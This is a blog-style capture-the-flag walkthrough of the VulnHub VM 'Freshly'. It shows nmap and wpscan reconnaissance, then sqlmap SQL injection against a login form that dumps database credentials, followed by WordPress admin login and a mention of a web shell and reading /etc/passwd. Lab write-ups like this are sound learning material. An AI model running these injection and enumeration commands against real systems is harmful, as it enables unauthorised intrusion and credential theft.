CTF Action - Freshly from Vulnhub


I’m back with another CTF walkthrough / diary. I was hungry for some action learning, so I went to VulnHub and picked a CTF somewhat randomly. Today’s fun is a CTF VM called: Freshly.


Let’s jump right into it. I ended up using VirtualBox to host this VM as my VMware Workstation 11 complained about importing the OVA.


Step One: Find My Target & Start Info Gathering

1
2
3
4
$ nmap -sP 192.168.1.1/24

result:
Nmap scan report for Freshly (192.168.1.149)

Sweet, I’ve got the IP for the target and now it’s time to roll.


After visiting the IP in my browser, I’m greeted with this picture:


alt text


I went looking for a Robots.txt, but none was found (darn).


Next, I did a scan to see what ports were open.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sV -A 192.168.1.149

result:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn’t have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn’t have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05+00:00
|_Not valid after: 2025-02-14T03:30:05+00:00
|_ssl-date: 2078-09-28T16:01:55+00:00; +63y59d14h23m12s from local time.
8080/tcp open http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn’t have a title (text/html).

So, it looks like I have a few ports to check out.


First bit of business is to hit 443, so I pull it up in my browser. After confirming some security, I’m greeted with a linked text.


Clicking the link goes to /wordpress/. Interesting.


Step Two: Wordpress Fun

Here are the steps I went through:



  1. I visited the readme.html page to see if it was there. It was and shows WP version 4.1.6

  2. It looks like the site is using some plugins, such as Contact Form 4.1, Cart66 Lite 1.5.3, etc.

  3. I decide to run WP SCAN against the site to speed up info gathering.


1
$ wpscan -u https://192.168.1.149/wordpress/ -e u,ap,tt,at

It’s my machine and I had something to do, so I didn’t mind running the above command (lots of looking and lots of time).


Right away I can see that this site is using a couple out-of-date plugins, which have vulnerabilities.


So I started messing with a possible Pro Player SQL injection vulnerability, but I’ve decided to hold off a little and keep looking for information.


Now I’m going to back and running dirbuster on the main site.


Here are the directory goodies I found quickly:



  • /login.php

  • /phpmyadmin/


Ok, time to look into this further.


Step Three: SQL Checking

I found about about the tool sqlmap, which I had never used. After checking it out, I used the following command to get it going:


1
2
3
4
5
6
7
$ sqlmap -u http://192.168.1.149/login.php –data=“user=1&password=1&s=Submit”

Result:

[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11

That’s pretty neat info there. Let’s see if there’s more it can do.


Next command is similar, but we’re specifying the database system and looking looking for database names.


1
2
3
4
5
$ sqlmap  -u http://192.168.1.149/login.php –data=”user=1&password=1&s=Submit” –dbms=mysql –dbs

Note: Answer yes to the question below.

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option ‘–time-sec’)? [Y/n] Y

After a handful of minutes, I’m presented with a listing of available databases:


1
2
3
4
5
6
7
8
available databases [7]:
[] information_schema
[] login
[] mysql
[] performance_schema
[] phpmyadmin
[] users
[*] wordpress8080

Sweet! All the monies are on wordpress8080 being the WP db,so let’s hit it. Also of note are some curious DB names, like login and users. Let’s advance things.


I’m going to run sqlmap again and this time add the table name.


1
2
3
4
5
6
7
$ sqlmap -u http://192.168.1.149/login.php --data=”user=1&password=1&s=Submit” --dbms=mysql --tables -D wordpress8080

Result:
Database: wordpress8080
[1 table]
+-------+
| users |

Alright, there’s a table called users here, so next I’m going to use that table name with sqlmap to get some more information (I hope).


1
2
3
4
5
6
7
8
9
10
11
$ sqlmap -u http://192.168.1.149/login.php –data=”user=1&password=1&s=Submit” –dbms=mysql –dump –T users -D wordpress8080

Result:
Database: wordpress8080
Table: users
[1 entry]
+———-+———————+
| username | password |
+———-+———————+

| admin | SuperSecretPassword |
+———-+———————+


So now I have some credentials to work with. Since I’m here and in sqlmap, I’m going to check out the users and login databases.


First, the login db.


1
2
3
4
5
6
Database: login
[2 tables]
+———–+
| user_name |
| users |
+———–+

For user_name, I was able to retrieve candyshop.


And for users, I retrieved:


1
2
3
4
5
6
7
8
9
Database: login
Table: users
[2 entries]
+———-+———–+
| password | user_name |
+———-+———–+

| password | candyshop |
| PopRocks | Sir |
+———-+———–+


Very interesting. I know have multiple credential options.


Finally, I’m going to check out the users db.


I received an error when trying to get tables, so I’m moving on. If needed, I’ll revisit this issue.


Step Four: Credential Checking & Completion

I went back to /login.php and tried candyshop/password and Sir/PopRocks. I noticed the the resulting integer below the form changed from 0 to 1 (perhaps to signify a login state?).


Ok, let’s go to /wp-admin/ now and see if we can get into the WordPress site.


Upon arriving, I’m presented with a page to update the DB. I confirm and continue right into the login screen.


user: admin
password: SuperSecretPassword


And . . . I’m in. I’m now in control of the Wordpress site. What now? :)


php web shell


/etc/passwd


1
# SECRET = “NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!”

I had a fun time doing this CTF. I recommend it for those just starting out, especially those with an interest in all things Wordpress.


If you’re interested in sqlmap, check out Tool Time - SQLMap.